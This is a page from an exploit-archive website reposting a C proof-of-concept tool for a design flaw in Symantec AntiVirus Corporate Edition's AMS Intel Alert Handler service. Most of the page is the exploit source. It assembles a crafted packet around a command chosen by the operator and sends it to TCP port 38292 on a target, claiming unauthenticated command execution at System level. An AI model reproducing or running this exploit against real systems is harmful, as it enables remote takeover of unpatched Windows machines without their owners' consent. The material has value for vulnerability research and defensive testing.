首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Symantec AMS Intel Alert Handler Service Design Flaw
来源:vfocus.net 作者:Spider 发布时间:2010-07-29  

// Remote command execution at System level without authentication
// Advisory:https://www.foofus.net/?page_id=149
// Exploit Title: Symantec AMS Intel Alert Handler service Design Flaw
// Date: 07/28/10
// Author: Spider
// Software Link: http://www.foofus.net/~spider/code/ams-cmd.cpp.txt
// Tested on: Symantec SAVCE 10.1.8 and earlier with AMS installed

// POC code to execute commands on system vulnerable to AMS2
// design flaw of Intel Alert Handler service (hndlrsvc.exe)
// within Symantec SAVCE 10.1.8 and earlier
// ***Created by Spider July 2009***
//--------------------Foofus.net-------------------------

#include <stdio.h>
#include <dos.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>

unsigned char payload[1000];
unsigned char inject1[] =
"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
"\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe8\x03\x00\x00\x50\x52\x47\x58\x43\x4e\x46\x47\x10\x00\x00\x00"
"\x00\x00\x00\x00\x04\x41\x4c\x48\x44\x5c\x46\x00\x00\x01\x00\x00"
"\x00\x01\x00\x0e\x00\x52\x69\x73\x6b\x20\x52\x65\x70\x61\x69\x72"
"\x65\x64\x00\x25\x00\x53\x79\x6d\x61\x6e\x74\x65\x63\x20\x41\x6e"
"\x74\x69\x56\x69\x72\x75\x73\x20\x43\x6f\x72\x70\x6f\x72\x61\x74"
"\x65\x20\x45\x64\x69\x74\x69\x6f\x6e\x00\xf9\x1d\x13\x4a\x3f\x0c"
"\x00\x4c\x41\x42\x53\x59\x53\x54\x45\x4d\x2d\x31\x00\x08\x08\x0a"
"\x00\x52\x69\x73\x6b\x20\x4e\x61\x6d\x65\x00\x07\x00\x05\x00\x54"
"\x65\x73\x74\x00\x08\x0a\x00\x46\x69\x6c\x65\x20\x50\x61\x74\x68"
"\x00\x07\x00\x05\x00\x54\x65\x73\x74\x00\x08\x11\x00\x52\x65\x71"
"\x75\x65\x73\x74\x65\x64\x20\x41\x63\x74\x69\x6f\x6e\x00\x07\x00"
"\x05\x00\x54\x65\x73\x74\x00\x08\x0e\x00\x41\x63\x74\x75\x61\x6c"
"\x20\x41\x63\x74\x69\x6f\x6e\x00\x07\x00\x05\x00\x54\x65\x73\x74"
"\x00\x08\x07\x00\x4c\x6f\x67\x67\x65\x72\x00\x07\x00\x05\x00\x54"
"\x65\x73\x74\x00\x08\x05\x00\x55\x73\x65\x72\x00\x07\x00\x05\x00"
"\x54\x65\x73\x74\x00\x08\x09\x00\x48\x6f\x73\x74\x6e\x61\x6d\x65"
"\x00\x0e\x00\x0c\x00\x4c\x41\x42\x53\x59\x53\x54\x45\x4d\x2d\x31"
"\x00\x08\x13\x00\x43\x6f\x72\x72\x65\x63\x74\x69\x76\x65\x20\x41"
"\x63\x74\x69\x6f\x6e\x73\x00\x07\x00\x05\x00\x54\x65\x73\x74\x00"
"\x00\x07\x08\x12\x00\x43\x6f\x6e\x66\x69\x67\x75\x72\x61\x74\x69"
"\x6f\x6e\x4e\x61\x6d\x65\x00\x22\x00\x20";

unsigned char cmdother[] =
"\x00\x08\x0c\x00\x43\x6f\x6d\x6d\x61\x6e\x64\x4c\x69\x6e\x65";

unsigned char inject2[] =
"\x00\x08\x08\x00\x52\x75\x6e\x41\x72\x67\x73\x00\x04\x00\x02\x00"
"\x20\x00\x03\x05\x00\x4d\x6f\x64\x65\x00\x04\x00\x02\x00\x00\x00"
"\x0a\x0d\x00\x46\x6f\x72\x6d\x61\x74\x53\x74\x72\x69\x6e\x67\x00"
"\x02\x00\x00\x00\x08\x12\x00\x43\x6f\x6e\x66\x69\x67\x75\x72\x61"
"\x74\x69\x6f\x6e\x4e\x61\x6d\x65\x00\x02\x00\x00\x00\x08\x0c\x00"
"\x48\x61\x6e\x64\x6c\x65\x72\x48\x6f\x73\x74\x00\x0b\x00\x09\x00"
"\x44\x45\x41\x44\x42\x45\x45\x46\x00\x00\x00\x00\x00";

void banner (char *proga)
 {
 system("cls");
 printf("\nUse: %s <ip>  <command>\n", proga);
 }

int main ( int argc, char *argv[] )
{
SOCKET sock;
WSADATA wsa;
struct sockaddr_in addr;

printf("    __        ___      __   __                __    \n");
printf(" | /  \\ |    /  _/___ |__| _\\ |___  _ __   | /  \\ | \n");
printf("\\_\\\\  //_/   \\_  \\ . \\|  |/ . / ._\\| `_/  \\_\\\\  //_/\n");
printf(" .'/()\\'.    /___/  _/|__|\\___\\___\\|_|     .'/()\\'. \n");
printf(" \\ \\  / /        |_\\                       \\ \\  / / \n");
printf("              AMS Remote Command Tool\n");

 int port;
 if ( argc < 3 )
  {
   banner(argv[0]);
   exit(0);
  }

char *ip_addr = argv[1];
int length = (int)strlen(argv[2]);

if (length > 128)
  {
      printf("\n WARNING WARNING WARNING %s \n");
      printf("\n Input Command String Greater than 128 Characters is not Permited %s \n");
      exit (0);
  }

// building injection packet 

 inject1[353] = length+3;
 inject1[355] = length+1;
 memcpy(payload,inject1,356);

 int a = 356;
  for (int i = 0; i<(length); i++)
    {
       a=a+1;payload[a] = argv[2][i];   
           }

 int b = a;
 for (int i = 0; i<=14; i++)
    {
        b=b+1;payload[b] = cmdother[i];   
  }

 int c = b;
 payload[c+2] = length+3;
 payload[c+4] = length+1;

 int d = c+5;
 for (int i = 0; i<length; i++)
    {
       d=d+1;payload[d] = argv[2][i];   
           }

 int e = d;
 for (int i = 0; i<=109; i++)
    {
        e=e+1;payload[e] = inject2[i];   
  }

// setting up socket and sending packet

 printf("[] preparing....\n");

   WSAStartup(MAKEWORD(2,0), &wsa);
  sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
  addr.sin_family = AF_INET;
  addr.sin_port = htons(38292);
  addr.sin_addr.s_addr = inet_addr(ip_addr);

 printf("[] connecting..\n");
  if ( connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1 )
   { printf("[-] connection failed!\n"); exit(0); }

 printf("[] sending crafted packet 1 ...\n");
  if ( send(sock, payload, sizeof(payload), 0) == -1 )
   { printf("[-] send failed!\n"); exit(0); }

closesocket(sock);
WSACleanup();

return 0;

}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Zemana AntiLogger AntiLog32.sy
·UPlusFTP Server v1.7.1.01 [ HT
·Apache Tomcat < 6.0.18 UTF8 Di
·Zemana AntiLogger AntiLog32.sy
·WM Downloader 3.1.2.2 2010.04.
·HTML Email Creator 2.42 build
·BarCodeWiz BarCode ActiveX 3.2
·BarCodeWiz Barcode ActiveX Con
·Microsoft Visual Studio 6.0 (V
·ChordPulse 1.4 Denial of Servi
·IE6 / 7 Remote Dos vulnerabili
·MAYASAN PORTAL V 1.0 / V 2.0 D
  推荐广告
CopyRight © 2002-2025 VFocuS.Net All Rights Reserved